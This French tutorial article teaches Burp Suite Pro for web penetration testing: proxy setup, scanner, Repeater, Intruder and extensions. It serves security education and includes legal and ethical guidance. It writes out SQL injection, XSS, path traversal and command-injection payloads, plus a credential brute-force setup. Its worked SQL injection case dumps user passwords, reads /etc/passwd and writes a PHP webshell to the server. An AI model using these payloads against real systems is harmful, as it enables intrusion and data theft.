Burp Suite Pro : Guide Complet du Pentesting Web Avancé (2025)
Maîtrisez Burp Suite Pro, l'outil professionnel de référence pour le pentesting d'applications web. Guide complet : Proxy, Scanner, Intruder, Repeater, extensions et cas pratiques d'exploitation de vulnérabilités.
Introduction : Burp Suite, le couteau suisse du pentesting web
Burp Suite est l'outil de test d'intrusion web le plus utilisé par les professionnels de la cybersécurité. Développé par PortSwigger, ce proxy intercepteur permet d'analyser, manipuler et exploiter les vulnérabilités des applications web modernes.
Que vous soyez pentester, bug bounty hunter ou développeur soucieux de la sécurité de vos applications, Burp Suite est un incontournable. Dans ce guide exhaustif, vous apprendrez à maîtriser Burp Suite Pro pour réaliser des audits de sécurité complets et découvrir des vulnérabilités avant les attaquants.
Qu'est-ce que Burp Suite ?
Burp Suite est une plateforme intégrée de test de sécurité d'applications web. Elle agit comme un proxy HTTP/HTTPS entre votre navigateur et les serveurs web, permettant d'intercepter, analyser et modifier les requêtes et réponses.
Les versions de Burp Suite
- Burp Suite Community Edition : Gratuite, fonctionnalités limitées, idéale pour débuter
- Burp Suite Professional : 449$/an, scanner automatique, outils avancés, support technique
- Burp Suite Enterprise : Pour les grandes organisations, intégration CI/CD, gestion centralisée
Ce guide se concentre sur Burp Suite Professional, la version utilisée par la majorité des pentesters.
Pourquoi Burp Suite est-il indispensable ?
- Intercepter et modifier les requêtes : Testez des payloads malveillants, contournez les contrôles côté client
- Scanner automatique de vulnérabilités : Détection d'injections SQL, XSS, SSRF, XXE, etc.
- Fuzzing avancé : Tests exhaustifs avec l'Intruder (force brute, fuzzing de paramètres)
- Répéter et analyser : Rejouer des requêtes pour comprendre le comportement de l'application
- Extensions puissantes : Logger++, Autorize, Turbo Intruder, JSON Web Tokens...
- Support HTTPS/TLS : Décryptage et analyse du trafic chiffré
Installation et Configuration
Téléchargement
Rendez-vous sur portswigger.net/burp/releases et téléchargez la version correspondant à votre OS (Windows, macOS, Linux).
Installation
# Linux
chmod +x burpsuit_community_linux.sh
./burpsuit_community_linux.sh
# macOS
Ouvrir le .dmg et glisser Burp Suite dans Applications
# Windows
Exécuter l'installateur .exeConfiguration du proxy
Par défaut, Burp écoute sur 127.0.0.1:8080. Vous devez configurer votre navigateur pour utiliser ce proxy.
Option 1 : Extension FoxyProxy (recommandé)
- Installez FoxyProxy dans Firefox ou Chrome
- Créez un profil : 127.0.0.1:8080
- Activez-le uniquement pendant vos tests
Option 2 : Configuration manuelle du navigateur
Firefox : Paramètres > Réseau > Configurer la connexion...
- Configuration manuelle du proxy
- HTTP Proxy : 127.0.0.1, Port : 8080
- Cochez "Utiliser ce serveur proxy pour tous les protocoles"
Installer le certificat CA de Burp
Pour intercepter le trafic HTTPS, vous devez installer le certificat de Burp.
- Démarrez Burp Suite
- Configurez votre proxy comme ci-dessus
- Dans le navigateur, allez sur : http://burpsuite
- Cliquez sur "CA Certificate" en haut à droite
- Enregistrez le fichier
cacert.der - Importez-le dans les certificats de votre navigateur/système
Firefox : Paramètres > Vie privée et sécurité > Certificats > Voir les certificats > Importer
Interface de Burp Suite : Tour d'horizon
Dashboard
Vue d'ensemble de votre session : tâches actives, scanner en cours, alertes de vulnérabilités.
Target
Arborescence de tous les sites que vous avez explorés. Permet de définir la portée (scope) de vos tests.
Proxy
Le cœur de Burp : intercepter et manipuler les requêtes HTTP/HTTPS en temps réel.
Intruder
Outil de fuzzing et d'attaque automatisée (force brute, fuzzing de paramètres).
Repeater
Rejouer une requête manuellement en modifiant les paramètres pour tester différents payloads.
Sequencer
Analyser la qualité des tokens de session (entropie, prédictibilité).
Decoder
Encoder/décoder des données (Base64, URL, HTML, hex, etc.).
Comparer
Comparer deux requêtes/réponses pour identifier les différences.
Scanner (Pro uniquement)
Scanner automatique de vulnérabilités : injection SQL, XSS, SSRF, XXE, etc.
Extensions (Extender)
Store d'extensions (BApp Store) pour ajouter des fonctionnalités supplémentaires.
1. Proxy : Intercepter et manipuler les requêtes
Activer l'interception
Onglet Proxy > Intercept, cliquez sur "Intercept is on".
Naviguez sur un site, Burp interceptera automatiquement la requête avant qu'elle n'atteigne le serveur.
Analyser une requête HTTP
GET /api/user/123 HTTP/1.1
Host: example.com
Cookie: session=abc123def456
User-Agent: Mozilla/5.0
Accept: application/jsonVous pouvez :
- Forward : Envoyer la requête telle quelle
- Drop : Supprimer la requête
- Modifier : Changer les paramètres, headers, body
- Action > Send to Repeater : Envoyer vers le Repeater pour tests manuels
- Action > Send to Intruder : Envoyer vers l'Intruder pour fuzzing
Cas pratique : Contourner une restriction côté client
Imaginons un formulaire qui limite le prix max à 100€ via JavaScript côté client.
- Interceptez la requête POST avec Burp
- Modifiez le paramètre
price=100enprice=1 - Forward la requête
- Si le serveur ne valide pas, vous payez 1€ au lieu de 100€ (vulnérabilité !)
HTTP History
Onglet Proxy > HTTP history : historique complet de toutes les requêtes/réponses.
Filtres utiles :
- Afficher uniquement les requêtes dans le scope
- Filtrer par méthode (GET, POST, PUT, DELETE)
- Filtrer par code de statut (200, 302, 403, 500)
- Rechercher des patterns (mot de passe, token, API key)
2. Scanner : Détection automatique de vulnérabilités (Pro)
Lancer un scan actif
- Clic droit sur une requête dans HTTP History
- Scan > Active scan
- Configurez la portée (URL spécifique ou site entier)
- Lancez le scan
Le scanner va automatiquement tester :
- Injections SQL :
' OR 1=1--,UNION SELECT - XSS (Cross-Site Scripting) :
<script>alert(1)</script> - Path Traversal :
../../etc/passwd - SSRF (Server-Side Request Forgery)
- XXE (XML External Entity)
- Command Injection :
; ls -la - Open Redirect
- Headers de sécurité manquants (CSP, HSTS, X-Frame-Options)
Scanner passif
Le scanner passif analyse les requêtes/réponses sans envoyer de payloads malveillants. Il détecte :
- Informations sensibles dans les réponses (emails, clés API, tokens)
- Headers HTTP non sécurisés
- Cookies sans flag
SecureouHttpOnly - Versions de logiciels obsolètes dans les bannières
Interpréter les résultats
Onglet Dashboard > Issue activity ou Target > Site map (icônes colorées).
Niveaux de sévérité :
- High (rouge) : Vulnérabilité critique (injection SQL, RCE)
- Medium (orange) : Risque modéré (XSS, CSRF)
- Low (jaune) : Risque faible (informations divulguées, headers manquants)
- Information (bleu) : Pas de risque direct mais informations utiles
3. Repeater : Rejouer et analyser des requêtes
Utilisation du Repeater
- Clic droit sur une requête > Send to Repeater
- Onglet Repeater
- Modifiez la requête (paramètres, headers, body)
- Cliquez sur Send
- Analysez la réponse dans le panneau de droite
Cas pratique : Tester une injection SQL
URL : GET /product?id=5
Testez des payloads SQL :
/product?id=5'
/product?id=5' OR 1=1--
/product?id=5' UNION SELECT NULL,NULL,NULL--
/product?id=5' AND SLEEP(5)--Si le serveur répond différemment (erreur SQL, contenu différent, délai), c'est potentiellement vulnérable.
Comparer plusieurs requêtes
Créez plusieurs onglets Repeater pour tester différents payloads et comparez les réponses.
4. Intruder : Fuzzing et attaques automatisées
Principe de l'Intruder
L'Intruder permet d'automatiser l'envoi de requêtes avec des payloads variables pour tester différentes hypothèses : force brute, fuzzing de paramètres, énumération...
Étapes d'utilisation
- Envoyez une requête vers l'Intruder : Send to Intruder
- Onglet Intruder > Positions : Définissez les points d'injection avec §§
- Onglet Payloads : Choisissez vos payloads (liste, nombres, fuzzing)
- Onglet Options : Configurez les threads, redirections, encodage
- Cliquez sur Start attack
Types d'attaques
- Sniper : Un seul point d'injection, teste chaque payload
- Battering ram : Plusieurs points d'injection, même payload pour tous
- Pitchfork : Plusieurs points, chaque position a sa propre liste (payloads synchronisés)
- Cluster bomb : Toutes les combinaisons possibles entre les positions
Cas pratique : Force brute d'authentification
Requête POST de login :
POST /login HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
username=admin&password=test123Configuration Intruder :
- Type d'attaque : Cluster bomb
- Positions :
username=§admin§&password=§test123§ - Payload set 1 (username) : liste de usernames (admin, root, user, etc.)
- Payload set 2 (password) : liste de mots de passe courants
- Start attack
- Analysez les réponses : code 302 (redirection) = succès, 401 = échec
Fuzzing de paramètres
URL : GET /api/user?id=5
Payload list : 1, 2, 3, -1, 0, 999, ' OR 1=1--, ../../../etc/passwd
Observez les différences de réponses (longueur, code, contenu) pour identifier des anomalies.
5. Extensions essentielles
Installer des extensions
Onglet Extender > BApp Store : parcourez les extensions disponibles et installez-les en un clic.
Extensions recommandées
1. Logger++
Logger HTTP avancé avec filtres, export CSV, recherche puissante. Meilleur que l'historique par défaut.
2. Autorize
Teste automatiquement les broken access control (IDOR, escalade de privilèges).
Principe : configurez deux sessions (user normal + admin), Autorize rejoue chaque requête avec les deux sessions pour détecter si un user peut accéder à des ressources admin.
3. Turbo Intruder
Version ultra-rapide de l'Intruder avec support Python pour scripts personnalisés. Idéal pour le fuzzing massif.
4. JSON Web Tokens (JWT)
Décode et manipule les JWT. Testez les vulnérabilités JWT : alg: none, clé faible, etc.
5. Param Miner
Découvre des paramètres cachés non documentés en testant des variations de noms courants.
6. Active Scan++
Améliore le scanner natif avec des checks supplémentaires (CORS, cache poisoning, host header injection).
7. Retire.js
Détecte les bibliothèques JavaScript obsolètes avec des vulnérabilités connues.
Cas pratique complet : Exploitation d'une injection SQL
Scénario
Application e-commerce avec recherche de produits : GET /search?q=laptop
Étape 1 : Détection
Interceptez la requête avec le Proxy, envoyez vers Repeater.
Testez des payloads SQL :
/search?q=laptop'
/search?q=laptop' OR 1=1--
/search?q=laptop' UNION SELECT NULL--Si le serveur renvoie une erreur SQL ou un comportement anormal, il est vulnérable.
Étape 2 : Enumération
Déterminez le nombre de colonnes avec UNION :
/search?q=laptop' UNION SELECT NULL--
/search?q=laptop' UNION SELECT NULL,NULL--
/search?q=laptop' UNION SELECT NULL,NULL,NULL--Continuez jusqu'à ne plus avoir d'erreur. Supposons 3 colonnes.
Étape 3 : Extraction de données
Récupérez la version de la base :
/search?q=laptop' UNION SELECT NULL,@@version,NULL--Listez les tables :
/search?q=laptop' UNION SELECT NULL,table_name,NULL FROM information_schema.tables--Récupérez les utilisateurs :
/search?q=laptop' UNION SELECT NULL,username,password FROM users--Étape 4 : Exploitation avancée (selon le SGBD)
Lecture de fichiers (MySQL) :
/search?q=laptop' UNION SELECT NULL,LOAD_FILE('/etc/passwd'),NULL--Écriture de fichier (webshell) :
/search?q=laptop' UNION SELECT NULL,'<?php system($_GET["cmd"]); ?>',NULL INTO OUTFILE '/var/www/html/shell.php'--Bonnes pratiques et éthique
N'utilisez Burp Suite que légalement
Tester la sécurité d'une application sans autorisation écrite explicite est illégal dans la plupart des pays.
Cas d'usage légitimes
- Auditer vos propres applications
- Missions de pentest avec contrat signé et autorisation écrite
- Bug bounty sur plateformes autorisées (HackerOne, Bugcrowd, YesWeHack)
- Environnements de formation (HackTheBox, TryHackMe, PortSwigger Academy)
Cas illégaux
- Tester des applications tierces sans permission
- Exploiter des vulnérabilités découvertes sans déclaration responsable
- Utiliser Burp pour du vol de données ou sabotage
Responsible Disclosure
Si vous trouvez une vulnérabilité :
- Contactez le propriétaire de manière privée
- Donnez un délai raisonnable pour corriger (30-90 jours)
- Ne divulguez publiquement qu'après correction ou expiration du délai
- Documentez vos découvertes (preuve de concept, impact, recommandations)
Ressources pour progresser
- PortSwigger Web Security Academy : portswigger.net/web-security - Cours gratuits avec labs interactifs
- Documentation officielle : portswigger.net/burp/documentation
- HackTheBox & TryHackMe : Plateformes d'entraînement avec machines vulnérables
- Bug Bounty Platforms : HackerOne, Bugcrowd, YesWeHack pour pratiquer légalement
- OWASP Top 10 : Liste des vulnérabilités web les plus critiques
Burp Suite Pro vs Community : Faut-il payer ?
| Fonctionnalité | Community (Gratuit) | Pro (449$/an) |
|---|---|---|
| Proxy HTTP/HTTPS | ✅ | ✅ |
| Repeater | ✅ | ✅ |
| Intruder (fuzzing) | ⚠️ Très lent (throttled) | ✅ Rapide |
| Scanner automatique | ❌ | ✅ |
| Extensions | ✅ (BApp Store) | ✅ |
| Save/Load projects | ❌ | ✅ |
| Collaborateur support | ❌ | ✅ |
| Comparator | ✅ | ✅ |
Verdict : Si vous êtes débutant ou utilisez Burp occasionnellement, Community suffit. Pour les professionnels (pentest, bug bounty), Pro est indispensable (scanner automatique + Intruder rapide).
Conclusion : Maîtriser Burp Suite, c'est maîtriser le pentesting web
Burp Suite est bien plus qu'un simple proxy : c'est une plateforme complète pour auditer la sécurité des applications web modernes. En maîtrisant ses outils (Proxy, Scanner, Repeater, Intruder) et en explorant les extensions, vous devenez capable de :
- ✅ Identifier des vulnérabilités avant qu'elles ne soient exploitées
- ✅ Comprendre les mécanismes d'attaque web (OWASP Top 10)
- ✅ Automatiser des tests de sécurité complexes
- ✅ Documenter et corriger des failles de manière professionnelle
Pratiquez sur des plateformes légales (PortSwigger Academy, HackTheBox), documentez vos découvertes et respectez toujours le cadre légal. La cybersécurité est une responsabilité, pas un jeu.
Bon pentesting responsable ! 🔐🛡️
⚠️ Avertissement et clause de non-responsabilité
Cet article est publié à des fins purement éducatives et informatives.
L'utilisation de Burp Suite ou de tout autre outil de test d'intrusion sur des applications, sites web ou infrastructures dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas reçu d'autorisation écrite explicite est strictement interdite et peut constituer une infraction pénale dans de nombreux pays.
L'auteur et CODAURA déclinent toute responsabilité quant à l'utilisation abusive, illégale ou malveillante des informations contenues dans cet article. Toute action que vous entreprenez avec les connaissances acquises ici relève de votre seule responsabilité.
Utilisez Burp Suite uniquement pour :
- Auditer vos propres applications web
- Réaliser des tests de sécurité dans le cadre de missions autorisées avec contrat écrit
- Participer à des programmes de bug bounty légitimes
- Vous former sur des environnements de test légaux (PortSwigger Academy, HackTheBox, TryHackMe)
En appliquant les techniques décrites dans cet article, vous acceptez d'agir de manière éthique, responsable et dans le strict respect des lois en vigueur.